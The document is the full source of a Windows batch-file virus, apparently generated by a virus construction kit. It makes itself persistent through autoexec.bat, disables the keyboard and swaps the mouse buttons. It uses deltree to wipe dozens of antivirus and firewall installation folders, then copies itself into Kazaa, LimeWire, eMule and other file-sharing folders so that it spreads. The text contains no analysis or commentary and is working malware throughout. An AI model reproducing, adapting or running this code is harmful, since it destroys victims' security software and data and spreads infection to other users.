::
:: Generated by Batch Virus Construction Kit 0.4 [DvL]-[rRLF]
:: Created by DvL
::
@echo off
@ver|find "XP"|if errorlevel 1 ctty nul|if not errorlevel 1 exit
break off
copy %0 %windir%\djwcuqko.bat>nul
echo.@call %windir%\djwcuqko.bat>>c:\autoexec.bat
rundll32 user,swapmousebutton
rundll32 keyboard,disable
set cqo=deltree/y c:\
%cqo%antiba~1\>nul
%cqo%antiba~2\>nul
%cqo%antiba~1.1\>nul
%cqo%antiba~1.2\>nul
%cqo%antiba~1.3\>nul
%cqo%antiba~1.4\>nul
%cqo%antiba~1.5\>nul
%cqo%antiba~1.6\>nul
%cqo%antiba~1.7\>nul
%cqo%antiba~1.8\>nul
%cqo%antivi~1\>nul
%cqo%antivi~2\>nul
%cqo%antiviru\>nul
%cqo%avg\>nul
%cqo%avp\>nul
%cqo%avp30\>nul
%cqo%avx\>nul
%cqo%avpers~1\>nul
%cqo%bitdef~1\>nul
%cqo%bitdef~2\>nul
%cqo%comman~1\>nul
%cqo%cleancih\>nul
%cqo%esafen\>nul
%cqo%findvi~1\>nul
%cqo%f-macro\>nul
%cqo%f-prot\>nul
%cqo%f-prot95\>nul
%cqo%f-secu~1\>nul
%cqo%fwin\>nul
%cqo%fwin32\>nul
%cqo%inocul~1\>nul
%cqo%inocul~2\>nul
%cqo%kasper~1\>nul
%cqo%kasper~2\>nul
%cqo%mcafee\>nul
%cqo%mcafee~1\>nul
%cqo%msav\>nul
%cqo%norman\>nul
%cqo%norton~1\>nul
%cqo%norton~2\>nul
%cqo%pav\>nul
%cqo%pccill~1\>nul
%cqo%pc-cil~1\>nul
%cqo%rav\>nul
%cqo%softwin\>nul
%cqo%tbav\>nul
%cqo%tbavw95\>nul
%cqo%toolkit\>nul
%cqo%trendm~1\>nul
%cqo%trex\>nul
%cqo%virus\>nul
%cqo%vpc\>nul
%cqo%vs95\>nul
%cqo%zonela~1\>nul
%cqo%zonela~2\>nul
set cqo=deltree/y c:\progra~1\
%cqo%antiba~1\>nul
%cqo%antiba~2\>nul
%cqo%antiba~1.1\>nul
%cqo%antiba~1.2\>nul
%cqo%antiba~1.3\>nul
%cqo%antiba~1.4\>nul
%cqo%antiba~1.5\>nul
%cqo%antiba~1.6\>nul
%cqo%antiba~1.7\>nul
%cqo%antiba~1.8\>nul
%cqo%antivi~1\>nul
%cqo%antivi~2\>nul
%cqo%avg\>nul
%cqo%avp\>nul
%cqo%avx\>nul
%cqo%avx2000\>nul
%cqo%avpers~1\>nul
%cqo%bitdef~1\>nul
%cqo%bitdef~2\>nul
%cqo%comman~1\>nul
%cqo%common~1\avpsha~1\>nul
%cqo%common~1\symant~1\>nul
%cqo%datafe~1\>nul
%cqo%deerfi~1.com\>nul
%cqo%f-prot\>nul
%cqo%f-prot95\>nul
%cqo%findvi~1\>nul
%cqo%f-secu~1\>nul
%cqo%f-secure\>nul
%cqo%fsi\>nul
%cqo%fwin\>nul
%cqo%fwin32\>nul
%cqo%grisoft\>nul
%cqo%inocul~1\>nul
%cqo%inocul~2\>nul
%cqo%intern~2\>nul
%cqo%kasper~1\>nul
%cqo%kasper~2\>nul
%cqo%mcafee\>nul
%cqo%mcafee~1\>nul
%cqo%mindso~1\>nul
%cqo%norman\>nul
%cqo%norton~1\>nul
%cqo%norton~2\>nul
%cqo%pandas~1\>nul
%cqo%protec~1\>nul
%cqo%protec~2\>nul
%cqo%quickh~1\>nul
%cqo%rav\>nul
%cqo%signal9\>nul
%cqo%softwin\>nul
%cqo%spysto~1\>nul
%cqo%symant~1\>nul
%cqo%tbav\>nul
%cqo%tinype~1\>nul
%cqo%trendm~1\>nul
%cqo%trendp~1\>nul
%cqo%trojan~1\>nul
%cqo%trojan~2\>nul
%cqo%virusm~1.0\>nul
%cqo%zonela~1\>nul
%cqo%zonela~2\>nul
set cqo=
copy %0 c:\kazaa\myshar~1\djwcuqko.bat>nul
copy %0 c:\mydown~1\djwcuqko.bat>nul
copy %0 c:\mydocu~1\djwcuqko.bat>nul
copy %0 c:\eigene~1\djwcuqko.bat>nul
copy %0 c:\progra~1\applej~1\incoming\djwcuqko.bat>nul
copy %0 c:\progra~1\bearsh~1\shared\djwcuqko.bat>nul
copy %0 c:\progra~1\edonke~1\incoming\djwcuqko.bat>nul
copy %0 c:\progra~1\emule\incoming\djwcuqko.bat>nul
copy %0 c:\progra~1\grokster\mygrok~1\djwcuqko.bat>nul
copy %0 c:\progra~1\icq\shared~1\djwcuqko.bat>nul
copy %0 c:\progra~1\kazaa\myshar~1\djwcuqko.bat>nul
copy %0 c:\progra~1\kazaal~1\myshar~1\djwcuqko.bat>nul
copy %0 c:\progra~1\kmd\myshar~1\djwcuqko.bat>nul
copy %0 c:\progra~1\limewire\shared\djwcuqko.bat>nul
copy %0 c:\progra~1\morpheus\myshar~1\djwcuqko.bat>nul
copy %0 c:\progra~1\overnet\bundles\djwcuqko.bat>nul
cls
